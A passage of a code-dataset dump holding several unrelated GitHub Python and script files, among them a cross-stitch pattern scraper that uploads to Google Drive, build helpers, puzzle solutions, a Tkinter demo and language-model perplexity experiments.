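        # sketch of the same idiom, assuming an authorized `service` handle:
        #
        #     items, request = [], service.files().list()
        #     while request is not None:
        #         page = request.execute()
        #         items.extend(page['items'])
        #         request = service.files().list_next(request, page)
        # ]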
items this application has stored, traversing\n # paginated results as necessary.\n items = []\n resource = self.service.files()\n request = resource.list()\n while request is not None:\n page = request.execute()\n items.extend(page['items'])\n request = resource.list_next(request, page)\n\n # Cache and return the list.\n self.log(logging.INFO, 'list_items', 'Caching list of items')\n self._items = items\n return items\n\n def ensure_folder(self):\n # Look for a folder with the given name. If we find it, return it.\n folder_type = 'application/vnd.google-apps.folder'\n for item in self.list_items():\n if (\n item['mimeType'] == folder_type and\n item['title'] == self.folder_name):\n return item\n\n # If we're here, we haven't found one. Create one and return it.\n folder = self.service.files().insert(body={\n 'title': self.folder_name, 'mimeType': folder_type}).execute()\n return folder\n\n def remove_file_if_exists(self, file_name, mime_type):\n base_name = os.path.basename(file_name)\n for item in self.list_items():\n if item['title'] == base_name and item['mimeType'] == mime_type:\n self.service.files().delete(fileId=item['id']).execute()\n self.log(\n logging.INFO, 'remove_file_if_exists',\n 'Removed existing {0}'.format(base_name))\n return True\n return False\n\n def upload_file(self, file_name, mime_type):\n media_body = MediaFileUpload(\n file_name, mimetype=mime_type, resumable=True)\n base_name = os.path.basename(file_name)\n body = {\n 'description': base_name,\n 'title': base_name,\n 'mimeType': mime_type\n }\n response = self.service.files().insert(\n body=body, media_body=media_body).execute()\n self.log(logging.INFO, 'upload_file', 'Uploaded {0}'.format(file_name))\n return response\n\n def move_to_parent(self, file_to_move):\n file_to_move['parents'] = [self.folder]\n response = self.service.files().update(\n fileId=file_to_move['id'], body=file_to_move).execute()\n self.log(\n logging.INFO, 'upload_files',\n 'Moved {0}'.format(file_to_move['title']))\n return response\n\n def _get_access_token(self):\n r = requests.post(\n 'https://www.googleapis.com/oauth2/v3/token',\n data={\n 'client_id': os.environ['GOOGLE_CLIENT_ID'],\n 'client_secret': os.environ['GOOGLE_CLIENT_SECRET'],\n 'grant_type': 'refresh_token',\n 'refresh_token': os.environ['GOOGLE_REFRESH_TOKEN'],\n })\n return r.json()['access_token']\n\n def _get_drive_service(self, access_token):\n http = AccessTokenCredentials(\n access_token, 'stitchbot/1.0').authorize(Http())\n service = build('drive', 'v2', http=http)\n return service\n\n\nclass StitchBot(object):\n def __init__(self, output_path=None, username=None, password=None):\n self.browser = RoboBrowser(history=True)\n self.output_path = output_path or tempfile.TemporaryDirectory().name\n\n self.username = username or os.environ['STITCHBOT_USERNAME']\n self.password = password or os.environ['STITCHBOT_PASSWORD']\n\n self.logger = logger.getChild('StitchBot')\n\n def log(self, level, method_name, message, *args, **kwargs):\n child_logger = self.logger.getChild(method_name)\n child_logger.log(level, message, *args, **kwargs)\n\n def scrape(self):\n self.log(logging.INFO, 'scrape', 'Starting scrape')\n\n self.log_in()\n self.navigate_to_free_pattern()\n scraped_filenames = self.download_pattern()\n\n self.log(logging.INFO, 'scrape', 'Scrape complete')\n\n return scraped_filenames\n\n def log_in(self):\n self.log(logging.INFO, 'log_in', 'Logging in')\n\n self.browser.open('http://dailycrossstitch.com/my-account/')\n form = self.browser.get_form(class_='login')\n 
form['username'] = self.username\n form['password'] = self.password\n self.browser.submit_form(form)\n\n self.log(logging.INFO, 'log_in', 'Logged in')\n\n def navigate_to_free_pattern(self):\n self.log(\n logging.INFO, 'navigate_to_free_pattern', 'Finding free pattern')\n\n self.browser.open('http://dailycrossstitch.com/')\n free_button = self.browser.find('a', class_='button', string='FREE')\n self.browser.follow_link(free_button)\n\n self.log(\n logging.INFO, 'navigate_to_free_pattern', 'Found free pattern')\n\n def download_pattern(self):\n self.log(logging.INFO, 'download_pattern', 'Downloading pattern')\n\n download_buttons = self.browser.find_all(\n 'a', class_='single_add_to_cart_button')\n download_urls = list(map(itemgetter('href'), download_buttons))\n local_filenames = [\n self.download_pattern_file(url) for url in download_urls]\n\n self.log(logging.INFO, 'download_pattern', 'Downloaded pattern')\n\n return local_filenames\n\n def download_pattern_file(self, url):\n self.log(\n logging.INFO, 'download_pattern_file',\n 'Downloading pattern file at {0}'.format(url))\n\n self.browser.open(url)\n download_script = self.browser.find(\n 'script', string=re.compile(r'^\\s*function startDownload'))\n if not download_script:\n return\n\n pdf_url_match = re.search(r'(http.+\\.pdf)', download_script.string)\n if not pdf_url_match:\n return\n\n pdf_url = pdf_url_match.group(1)\n self.browser.open(pdf_url)\n\n output_filename = self.save_pattern(self.browser.response)\n\n self.log(\n logging.INFO, 'download_pattern_file',\n 'Downloaded pattern file at {0}'.format(url))\n\n return output_filename\n\n def save_pattern(self, response):\n self.log(logging.INFO, 'save_pattern', 'Saving pattern')\n\n try:\n os.makedirs(self.output_path)\n except OSError:\n pass\n\n filename = self.get_filename(response.headers)\n output_filename = os.path.join(self.output_path, filename)\n with open(output_filename, 'wb') as output_file:\n output_file.write(response.content)\n\n self.log(\n logging.INFO, 'save_pattern',\n 'Saved pattern to {0}'.format(output_filename))\n\n return output_filename\n\n def get_filename(self, headers, default_filename='pattern.pdf'):\n filename_match = re.search(\n r'filename=\"?([^\"]+)\"?', headers.get('Content-Disposition', ''))\n if not filename_match:\n return default_filename\n\n return filename_match.group(1)\n\n\ndef main(output_path=None, *args):\n local_filenames = StitchBot(output_path).scrape()\n DriveFolder('Stitchbot patterns').upload_files(local_filenames)\n\n\nif __name__ == '__main__':\n main(*sys.argv[1:])\n","repo_name":"myersjustinc/stitchbot","sub_path":"stitchbot.py","file_name":"stitchbot.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"25945862664","text":"from __future__ import print_function, unicode_literals\n\nimport errno\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tarfile\nimport tempfile\nfrom contextlib import contextmanager\n\n\nif sys.platform.startswith(\"linux\"):\n sys.platform = \"linux\"\n\n\n# From https://stackoverflow.com/a/19445241/262432\nif sys.platform in [\"cygwin\", \"win32\"]:\n _bltn_open = tarfile.bltn_open\n\n def safe_path(path):\n if not os.path.isabs(path):\n path = os.path.join(os.getcwd(), path)\n\n # http://msdn.microsoft.com/en-us/library/aa365247%28v=vs.85%29.aspx#maxpath\n if len(path) >= 200:\n path = \"\\\\\\\\?\\\\\" + os.path.normpath(path)\n return path\n\n def long_bltn_open(name, 
*args, **kwargs):\n        return _bltn_open(safe_path(name), *args, **kwargs)\n\n    tarfile.bltn_open = long_bltn_open\n\n\n@contextmanager\ndef cd(path):\n    cwd = os.getcwd()\n    os.chdir(path)\n    print(\"cd \" + path)\n    try:\n        yield path\n    finally:\n        os.chdir(cwd)\n\n\ndef sed_inplace(path, pattern, sub, regex=False):\n    \"\"\"Replaces all occurrences of ``pattern`` in a file with ``sub``.\n\n    A file is modified **in-place**.\n    \"\"\"\n    print(\"s/{}/{}/ in file {}\".format(pattern, sub, path))\n    with open(path, \"r\") as input:\n        with tempfile.NamedTemporaryFile(\"w\", delete=False) as output:\n            for line in input:\n                output.write(line.replace(pattern, sub) if not regex else\n                             re.sub(pattern, sub, line))\n\n    shutil.copyfile(output.name, path)\n\n\ndef run(command, **kwargs):\n    print(command)\n    return subprocess.check_call(command, shell=True, **kwargs)\n\n\ndef maybe_makedirs(path):\n    print(\"mkdir -p \" + path)\n    try:\n        os.makedirs(path)\n    except OSError as e:\n        if e.errno != errno.EEXIST:\n            raise\n","repo_name":"criteo-forks/xgboost-jars","sub_path":"_internal.py","file_name":"_internal.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"19"}
{"seq_id":"1343999605","text":"def solution(n, edge):\n    graph = [[] for _ in range (n + 1)]\n    distance = [-1 for _ in range(n + 1)]\n    for v in edge:\n        a, b = v\n        graph[a].append(b)\n        graph[b].append(a)\n    now = [1]\n    next = []\n    distance[1] = 0\n    d = 0\n    while now:\n        for n in now:\n            for i in graph[n]:\n                if distance[i] == -1:\n                    next.append(i)\n                    distance[i] = d + 1\n        now = next.copy()\n        next = []\n        d += 1\n    return distance.count(max(distance))\n\n\"\"\"\nUse BFS to compute the distance from node 1 to every node.\nCount and return the number of nodes at the maximum distance.\n\"\"\"","repo_name":"ORANZINO/Algorithm","sub_path":"Programmers/가장 먼 노드.py","file_name":"가장 먼 노드.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"25012112552","text":"import argparse\n\nfrom config import MAX_REQUESTS\n\ndef str2bool(value):\n    if value.lower() in ('yes', 'true', 't', 'y', '1'):\n        return True\n    elif value.lower() in ('no', 'false', 'f', 'n', '0'):\n        return False\n    else:\n        raise argparse.ArgumentTypeError('Boolean value expected.')\n\ndef check_max_requests(value):\n    ivalue = int(value)\n    if ivalue not in MAX_REQUESTS:\n        raise argparse.ArgumentTypeError(\"%s is an invalid max request value\" % value)\n    return ivalue","repo_name":"chanb/MeLeCaR","sub_path":"utils/parser_util.py","file_name":"parser_util.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"71052758123","text":"import os.path\nimport Fs.driver\nfrom nut import Print\n\nclass FileContext(Fs.driver.FileContext):\n\tdef __init__(self, url, sz, mode, parent):\n\t\tsuper(FileContext, self).__init__(url, sz, mode, parent)\n\t\tif sz:\n\t\t\tself.size = sz\n\t\telse:\n\t\t\tself.size = os.path.getsize(self.url)\n\t\tself.handle = open(self.url, self.mode)\n\n\tdef close(self):\n\t\tif self.handle:\n\t\t\tself.handle.close()\n\t\t\tself.handle = None\n\n\tdef read(self, sz=None):\n\t\treturn self.handle.read(sz)\n\n\tdef chunk(self, callback, offset=None, size=None):\n\t\tchunkSize = 0x100000\n\n\t\tif offset is not None:\n\t\t\tself.handle.seek(int(offset), 0)\n\n\t\t\tif size is None:\n\t\t\t\tsize = self.size - offset\n\t\telif size is None:\n\t\t\tsize = self.size\n\n\t\tr = 
self.handle\n\n\t\ti = 0\n\n\t\ttry:\n\t\t\twhile True:\n\t\t\t\tchunk = r.read(min(size-i, chunkSize))\n\n\t\t\t\tif not chunk:\n\t\t\t\t\tbreak\n\n\t\t\t\ti += len(chunk)\n\n\t\t\t\tcallback(chunk)\n\t\texcept BaseException as e:\n\t\t\tPrint.info('native chunk exception: ' + str(e))\n\nclass DirContext(Fs.driver.DirContext):\n\tdef __init__(self, url, parent):\n\t\tsuper(DirContext, self).__init__(url, parent)\n\n\tdef ls(self):\n\t\tentries = []\n\t\tfor f in os.listdir(self.url):\n\t\t\tpath = os.path.join(self.url, f)\n\t\t\tif os.path.isfile(path):\n\t\t\t\tentries.append(Fs.driver.FileEntry(path, os.path.getsize(path)))\n\t\t\telse:\n\t\t\t\tentries.append(Fs.driver.DirEntry(path))\n\t\treturn entries\n\n\nclass Native(Fs.driver.Interface):\n\tdef __init__(self, url=None):\n\t\tsuper(Native, self).__init__(url)\n\t\tself.dirContextType = DirContext\n\t\tself.fileContextType = FileContext\n\n\nFs.driver.registry.add('', Native)\n","repo_name":"blawar/nut","sub_path":"Fs/driver/native.py","file_name":"native.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":997,"dataset":"github-code","pt":"19"} +{"seq_id":"33831761824","text":"import pygame\nfrom classes import *\nimport random\nimport time\nfrom pygame.locals import *\nali = False\nmiss = False\nmisarr1 = []\nmisarr2 = []\nalienarr1 = []\nscore = [0]\n\n\ndef shoot1(left, top):\n shot = Mis1(left, top - 100)\n misarr1.append(shot)\n\n\ndef shoot2(left, top):\n shot = Mis2(left, top - 100)\n misarr2.append(shot)\n\n\ndef createalien():\n x = random.randint(1, 8) * 100\n y = random.randint(0, 1) * 100\n z = time.time()\n alien = Alien1(x, y, z)\n alienarr1.append(alien)\n\n\ndef delalien():\n z = time.time()\n for x in alienarr1:\n if z - x.time > 7:\n alienarr1.pop(alienarr1.index(x))\n\n\ndef collision():\n for x in alienarr1:\n for y in misarr1:\n if x.left == y.left and x.top == y.top:\n score[0] += 10\n if x not in alienarr1:\n pass\n else:\n alienarr1.remove(x)\n misarr1.remove(y)\n\n for x in alienarr1:\n for y in misarr2:\n if x.left == y.left and x.top >= y.top:\n x.image = pygame.image.load(\"alien2.jpg\")\n x.time += 5\n misarr2.pop(misarr2.index(y))\n","repo_name":"ayushshivani/Space-Invader","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17537587165","text":"import json\n\ndef main():\n\t\n\ttotalString = \"\";\n \n\twith open(\"MouseBindingsSettings.json\") as mouseBindingsSettingsFile:\n\t\tmouseBindingsSettings = json.load(mouseBindingsSettingsFile)\t\n \n\t\tfor i in range(1, 13):\n\t\t\tbuttoniString = f\"\"\"\n; button {i}\nWinGet, procName, ProcessName, A\n\nswitch currentMode\n{{\n\"\"\"\n\t\t\tfor mode, modeActions in mouseBindingsSettings.items():\n\t\t\t\tif (mode == \"default\"):\n\t\t\t\t\tcontinue; # covering default at the end with its own case\n\n\t\t\t\tif (len(modeActions[str(i)])):\n\t\t\t\t\tbuttoniString = addAction(buttoniString, modeActions[\"name\"], mode, modeActions[str(i)])\n\t\t\t\t\t\n\t\t\t\n\t\t\tdefaultActions = mouseBindingsSettings[\"default\"][str(i)]\n\n\t\t\tif (len(defaultActions) > 1): # different default actions in different programs\n\t\t\t\tbuttoniString += \"\"\"\n\n\tdefault:\n\t\tswitch procName\n\t\t{\n\"\"\"\n\t\t\t\tfor action, actionList in defaultActions:\n\t\t\t\t\tif action == \"default\":\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\t\t\tbuttoniString += 
f\"\\n\t\t\tcase {action}: {actionList[0]}\\n\t\treturn\"\n\n\n\t\t\telse:\n\t\t\t\tbuttoniString += f\"\"\"\n\n\tdefault:\n\t\t{defaultActions[\"default\"][0]}\n\"\"\"\n\n\t\t\tbuttoniString += \"}\"\n\n\t\t\ttotalString += f\"onButton{i}(currentMode)\\n{{\\n{buttoniString}\\n}}\\n\\n\"\n\n\twith open(\"MouseBindingsTemplate.ahk\") as template:\n\t\twith open(\"MouseBindings.ahk\", \"w\") as output:\n\t\t\toutput.write(template.read())\n\t\t\toutput.write(\"\\n\")\n\t\t\toutput.write(totalString)\n \n\ndef addAction(buttoniString, modeName, modeNum, actions):\n\tif (len(actions) > 1 or \"default\" not in actions): # different default actions in different programs\n\t\tbuttoniString += f\"\"\"\n\n\tcase {modeNum}: ; {modeName}\n\t\tswitch procName\n\t\t{{\n\"\"\"\n\t\tfor action, actionList in actions.items():\n\t\t\tif action == \"default\":\n\t\t\t\tcontinue\n\t\t\t\t\t\n\t\t\tbuttoniString += f\"\\n\t\t\tcase \\\"{action}\\\": {actionList[0]}\\n\t\treturn\"\n\n\t\tif \"default\" in actions:\n\t\t\tbuttoniString += f\"\"\"\n\n\tdefault:\n\t\t{actions[\"default\"][0]}\n\"\"\"\n\t\tbuttoniString += \"\\n}\"\n\n\tif \"default\" in actions:\n\t\tbuttoniString += f\"\"\"\n\n\tcase {modeNum}: ; {modeName}\n\t\t{actions[\"default\"][0]}\n\t\treturn\n\"\"\"\n\t\n\treturn buttoniString\n\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"Talia-12/AutoHotKeyFiles","sub_path":"QoL/generate_MouseBindings.py","file_name":"generate_MouseBindings.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71351081963","text":"def manhattan(pos):\n return abs(pos[0]) + abs(pos[1])\n\ndef storePos(path):\n positions = {}\n x = 0\n y = 0\n steps = 0\n for item in path:\n direction = item[0]\n amount = int(item[1:])\n for i in range(amount):\n if direction == 'U': y += 1\n elif direction == 'D': y -= 1\n elif direction == 'R': x += 1\n elif direction == 'L': x -= 1\n steps += 1\n pos = (x,y)\n if pos not in positions: # only store first time reached\n positions[pos] = steps\n return positions\n\n\nwith open(\"input.txt\", 'r') as f:\n w1 = f.readline().strip().split(',')\n w2 = f.readline().strip().split(',')\n\n\nwire1 = storePos(w1)\nwire2 = storePos(w2)\ncross = set(wire1.keys()).intersection(set(wire2.keys()))\n\n\nleastSteps = float('inf')\n\nfor position in cross:\n if wire1[position] + wire2[position] < leastSteps:\n leastSteps = wire1[position] + wire2[position]\n intersection = position\nprint(\"Least amount of steps to intersection %s is %d steps\" %(intersection, leastSteps))\n","repo_name":"kazemicode/AdventOfCode","sub_path":"2019/3/day3-part2.py","file_name":"day3-part2.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33954399020","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 3 19:14:06 2020\r\n\r\n@author: kpurc\r\nhttps://realpython.com/python-gui-tkinter/\r\nhttps://effbot.org/tkinterbook/entry.html\r\nhttps://www.delftstack.com/howto/python-tkinter/how-to-change-tkinter-button-color/\r\nhttps://www.python-course.eu/tkinter_entry_widgets.php\r\n\"\"\"\r\n\r\nstatement = \"Hi from Tkinter!\"\r\n\r\nimport tkinter as tk\r\n\r\nwindow = tk.Tk()\r\nwindow.configure(bg='white')\r\n\r\nframe_a = tk.Frame()\r\ngreet_frame = tk.Frame()\r\nname_frame = tk.Frame()\r\n\r\ngreeting = tk.Label(master=greet_frame, text=statement, fg =\"white\", bg=\"black\", width='20', 
height='10')\r\n#width and height by text units each the size of '0'\r\ngreeting.pack()\r\n\r\n\r\nget_name = tk.Label(master=name_frame,text='Enter your name', fg='white', bg='#875bd1', width='20', height='3', font=\"Georgia\")\r\nget_name.pack()\r\n\r\nentry = tk.Entry(master=name_frame, fg=\"white\", bg='black', width='20', font=\"Georgia\")\r\ndef callback(event):\r\n name = entry.get()\r\n your_name = tk.Label(master=name_frame, text=('Your name is '+name), bg=\"#b397e2\", font=\"Georgia\", width='20')\r\n your_name.pack()\r\nentry.bind(\"\", callback)\r\nentry.pack()\r\n\r\n'''\r\nthis is a little more complicated so the above way is better I think, but this still works\r\nentry = tk.Entry(master=name_frame, fg=\"white\", bg='black', width='20')\r\nentry.pack()\r\n\r\ndef callback():\r\n name = entry.get()\r\n your_name = tk.Label(master=name_frame, text=('Your name is: '+name), bg=\"white\")\r\n your_name.pack()\r\n\r\n\r\nget = tk.Button(master=name_frame, text='Enter',command=callback, bg='white')\r\n#get.configure(bg=\"yellow\") #if you need to change the color\r\nget.pack()\r\n'''\r\n\r\n\r\nname_frame.pack()\r\n\r\nwindow.mainloop()\r\n\r\n","repo_name":"kathlynpurcell/using_tkinter","sub_path":"tkinter_gui.py","file_name":"tkinter_gui.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25178187937","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport collections\n\n\nwith open('training_data.txt') as f:\n training_data = [word for line in f for word in line.split()]\n\nwith open('test_data.txt') as f:\n test_data = [word for line in f for word in line.split()]\n\n# number of words in the entire training data\nN = len(training_data)\n\n#Word dictionary from train and test data\n\nvocabulary = training_data + test_data\n\nlist_set1 = set(vocabulary)\ndistinct_words = (list(list_set1))\nK = len(distinct_words)\nprint(K)\n\n\n# Task 1: Model Training, Prediction and Evaluation\n\nALPHA_PRIME = 5\nALPHA_0 = ALPHA_PRIME * 1.0 * K\n\n\nTRAINING_SETS = [N / 128, N / 64, N / 16, N / 4, N] # training sizes\n\n\nPERPLEXITY_MLE_TRAIN_ALL_SETS = []\nPERPLEXITY_MAP_TRAIN_ALL_SETS = []\nPERPLEXITY_PD_TRAIN_ALL_SETS = []\nPERPLEXITY_MLE_TEST_ALL_SETS = []\nPERPLEXITY_MAP_TEST_ALL_SETS = []\nPERPLEXITY_PD_TEST_ALL_SETS = []\n\n#Run loop for each training data size\nfor i in range(len(TRAINING_SETS)):\n\n N1 = int(TRAINING_SETS[i])\n # dictionary of word frequency in training data\n training_dic = {}\n\n for j in range(N1):\n training_dic[training_data[j]] = training_dic.get(training_data[j], 0.0) + 1.0\n\n p_ML = {}\n p_MAP = {}\n p_pd = {}\n for k in range(K):\n m_k = training_dic.get(distinct_words[k], 0.01)\n alpha_k = ALPHA_PRIME\n p_ML [distinct_words[k]] = m_k / N1\n\n p_MAP[distinct_words[k]] = (m_k + alpha_k - 1) / (N1 + ALPHA_0 - K)\n p_pd [distinct_words[k]] = (m_k + alpha_k) / (N1 + ALPHA_0)\n\n # Training perplexity for different models\n print(p_ML[distinct_words[k]])\n PERPLEXITY_MLE_TRAINING = 0.0\n PERPLEXITY_MAP_TRAINING = 0.0\n PERPLEXITY_PD_TRAINING = 0.0\n\n for j in range(N1):\n PERPLEXITY_MLE_TRAINING = PERPLEXITY_MLE_TRAINING + np.log(p_ML[training_data[j]])\n PERPLEXITY_MAP_TRAINING = PERPLEXITY_MAP_TRAINING + np.log(p_MAP[training_data[j]])\n PERPLEXITY_PD_TRAINING = PERPLEXITY_PD_TRAINING + np.log(p_pd[training_data[j]])\n C=(-1.0) / N1\n PERPLEXITY_MLE_TRAINING = np.exp(C*PERPLEXITY_MLE_TRAINING)\n PERPLEXITY_MAP_TRAINING = 
np.exp(C*PERPLEXITY_MAP_TRAINING)\n PERPLEXITY_PD_TRAINING = np.exp(C*PERPLEXITY_PD_TRAINING)\n\n PERPLEXITY_MLE_TRAIN_ALL_SETS.append(PERPLEXITY_MLE_TRAINING)\n PERPLEXITY_MAP_TRAIN_ALL_SETS.append(PERPLEXITY_MAP_TRAINING)\n PERPLEXITY_PD_TRAIN_ALL_SETS.append(PERPLEXITY_PD_TRAINING)\n\n # Test perplexity for differrent models\n\n PERPLEXITY_MLE_TEST = 0.0\n PERPLEXITY_MAP_TEST = 0.0\n PERPLEXITY_PD_TEST = 0.0\n N_test_data= len(test_data)\n for j in range(N_test_data):\n PERPLEXITY_MLE_TEST = PERPLEXITY_MLE_TEST + np.log(p_ML[test_data[j]])\n PERPLEXITY_MAP_TEST = PERPLEXITY_MAP_TEST + np.log(p_MAP[test_data[j]])\n PERPLEXITY_PD_TEST = PERPLEXITY_PD_TEST + np.log(p_pd[test_data[j]])\n C1=(-1.0) / N_test_data\n PERPLEXITY_MLE_TEST = np.exp(C1 * PERPLEXITY_MLE_TEST)\n PERPLEXITY_MAP_TEST = np.exp(C1 * PERPLEXITY_MAP_TEST)\n PERPLEXITY_PD_TEST = np.exp(C1 * PERPLEXITY_PD_TEST)\n\n PERPLEXITY_MLE_TEST_ALL_SETS.append(PERPLEXITY_MLE_TEST)\n PERPLEXITY_MAP_TEST_ALL_SETS.append(PERPLEXITY_MAP_TEST)\n PERPLEXITY_PD_TEST_ALL_SETS.append(PERPLEXITY_PD_TEST)\n\n\n\nprint(\"Task I: Model Training, Prediction and Evaluation \")\nprint(\"----------------------------------------------------------------\")\nprint(\"----------------------------------------------------------------\")\nprint(\"PERPLEXITY MLE TRAINING\")\nprint(\"Perplexities on training data N/128 -> \",PERPLEXITY_MLE_TRAIN_ALL_SETS[0])\nprint(\"Perplexities on training data N/64 -> \",PERPLEXITY_MLE_TRAIN_ALL_SETS[1])\nprint(\"Perplexities on training data N/16 -> \",PERPLEXITY_MLE_TRAIN_ALL_SETS[2])\nprint(\"Perplexities on training data N/4 -> \",PERPLEXITY_MLE_TRAIN_ALL_SETS[3])\nprint(\"Perplexities on training data N -> \",PERPLEXITY_MLE_TRAIN_ALL_SETS[4])\n\nprint(\"----------------------------------------------------------------\")\n\nprint(\"PERPLEXITY MLE TEST(TEST Data has 640000 words)\")\nprint(\"Perplexities on test using training data N/128 -> \",PERPLEXITY_MLE_TEST_ALL_SETS[0])\nprint(\"Perplexities on test using training data N/64 -> \",PERPLEXITY_MLE_TEST_ALL_SETS[1])\nprint(\"Perplexities on test using training data N/16 -> \",PERPLEXITY_MLE_TEST_ALL_SETS[2])\nprint(\"Perplexities on test using training data N/4 -> \",PERPLEXITY_MLE_TEST_ALL_SETS[3])\nprint(\"Perplexities on test using training data N -> \",PERPLEXITY_MLE_TEST_ALL_SETS[4])\n\nprint(\"----------------------------------------------------------------\")\nprint(\"----------------------------------------------------------------\")\nprint(\"PERPLEXITY MAP TRAINING\")\nprint(\"Perplexities on training data N/128 -> \",PERPLEXITY_MAP_TRAIN_ALL_SETS[0])\nprint(\"Perplexities on training data N/64 -> \",PERPLEXITY_MAP_TRAIN_ALL_SETS[1])\nprint(\"Perplexities on training data N/16 -> \",PERPLEXITY_MAP_TRAIN_ALL_SETS[2])\nprint(\"Perplexities on training data N/4 -> \",PERPLEXITY_MAP_TRAIN_ALL_SETS[3])\nprint(\"Perplexities on training data N -> \",PERPLEXITY_MAP_TRAIN_ALL_SETS[4])\n\nprint(\"----------------------------------------------------------------\")\n\nprint(\"PERPLEXITY MAP TEST (TEST Data has 640000 words)\")\nprint(\"Perplexities on test using training data N/128 -> \",PERPLEXITY_MAP_TEST_ALL_SETS[0])\nprint(\"Perplexities on test using training data N/64 -> \",PERPLEXITY_MAP_TEST_ALL_SETS[1])\nprint(\"Perplexities on test using training data N/16 -> \",PERPLEXITY_MAP_TEST_ALL_SETS[2])\nprint(\"Perplexities on test using training data N/4 -> \",PERPLEXITY_MAP_TEST_ALL_SETS[3])\nprint(\"Perplexities on test using training data N -> \" 
,PERPLEXITY_MAP_TEST_ALL_SETS[4])\n\nprint(\"----------------------------------------------------------------\")\nprint(\"----------------------------------------------------------------\")\n\nprint(\"PERPLEXITY PD TRAINING\")\nprint(\"Perplexities on training data N/128 -> \",PERPLEXITY_PD_TRAIN_ALL_SETS[0])\nprint(\"Perplexities on training data N/64 -> \",PERPLEXITY_PD_TRAIN_ALL_SETS[1])\nprint(\"Perplexities on training data N/16 -> \",PERPLEXITY_PD_TRAIN_ALL_SETS[2])\nprint(\"Perplexities on training data N/4 -> \",PERPLEXITY_PD_TRAIN_ALL_SETS[3])\nprint(\"Perplexities on training data N -> \",PERPLEXITY_PD_TRAIN_ALL_SETS[4])\n\n\nprint(\"----------------------------------------------------------------\")\nprint(\"PERPLEXITY PD TEST (TEST Data has 640000 words)\")\nprint(\"Perplexities on test using training data N/128 -> \",PERPLEXITY_PD_TEST_ALL_SETS[0])\nprint(\"Perplexities on test using training data N/64 -> \",PERPLEXITY_PD_TEST_ALL_SETS[1])\nprint(\"Perplexities on test using training data N/16 -> \",PERPLEXITY_PD_TEST_ALL_SETS[2])\nprint(\"Perplexities on test using training data N/4 -> \",PERPLEXITY_PD_TEST_ALL_SETS[3])\nprint(\"Perplexities on test using training data N -> \",PERPLEXITY_PD_TEST_ALL_SETS[4])\n\nprint(\"----------------------------------------------------------------\")\nprint(\"----------------------------------------------------------------\")\n#Perplexity Plots\n\nplt.plot(TRAINING_SETS, PERPLEXITY_MLE_TRAIN_ALL_SETS,'mv--',label='MLE_train')\nplt.plot(TRAINING_SETS, PERPLEXITY_MLE_TEST_ALL_SETS,'m^--' ,label='MLE_test')\nplt.plot(TRAINING_SETS, PERPLEXITY_MAP_TRAIN_ALL_SETS,'cD-',label='MAP_train')\nplt.plot(TRAINING_SETS, PERPLEXITY_MAP_TEST_ALL_SETS,'cx--',label='MAP_test')\nplt.plot(TRAINING_SETS, PERPLEXITY_PD_TRAIN_ALL_SETS,'y*-' ,label='PD_train')\nplt.plot(TRAINING_SETS, PERPLEXITY_PD_TEST_ALL_SETS,'y8--' ,label='PD_test')\n\nplt.xlabel('N(training data size)')\nplt.ylabel('Perplexities')\nplt.title('The Perplexities on the train and test data under MLE,MAP And PD')\n\nplt.legend()\nplt.grid()\nplt.show()\n\n\n# Task 2: Model Selection\n\n\nALPHA_PRIME_list = range(1, 11, 1) #alpha parameter range\nN1 = N / 128 #training size\n\nPERPLEXITY_PD_TEST_ALL_SETS = []\n\nlog_evidence = []\nN1=int(N1)\nfor ALPHA_PRIME in ALPHA_PRIME_list:\n ALPHA_0 = K * ALPHA_PRIME\n\n #log evidence on training data\n\n temp_log_evidence = 0.0\n\n for k in range(N1):\n temp_log_evidence = temp_log_evidence + (-1.0) * np.log(ALPHA_0 + k)\n\n training_dic = {}\n\n for j in range(N1):\n training_dic[training_data[j]] = training_dic.get(training_data[j], 0) + 1\n\n #Perplexity on test data and log evidence on training data\n\n p_pd = {}\n\n for k in range(K):\n m_k = training_dic.get(distinct_words[k], 0.01)\n alpha_k = ALPHA_PRIME\n p_pd[distinct_words[k]] = (m_k + alpha_k) * 1.0 / (N1 + ALPHA_0)\n if (m_k >= 1):\n\n for i in range(m_k):\n temp_log_evidence += np.log(alpha_k + i)\n\n PERPLEXITY_PD_TEST = 0.0\n\n for j in range(len(test_data)):\n PERPLEXITY_PD_TEST = PERPLEXITY_PD_TEST + np.log(p_pd[test_data[j]])\n\n PERPLEXITY_PD_TEST = np.exp(PERPLEXITY_PD_TEST * (-1.0) / len(test_data))\n PERPLEXITY_PD_TEST_ALL_SETS.append(PERPLEXITY_PD_TEST)\n\n log_evidence.append(temp_log_evidence)\n\nPERPLEXITY_PD_TEST_ALL_SETS = [(int)(item) for item in PERPLEXITY_PD_TEST_ALL_SETS]\nlog_evidence = [(int)(item) for item in log_evidence]\n\n\n\nprint(\"----------------------------------------------------------------\")\nprint(\"Task II: Model Selection 
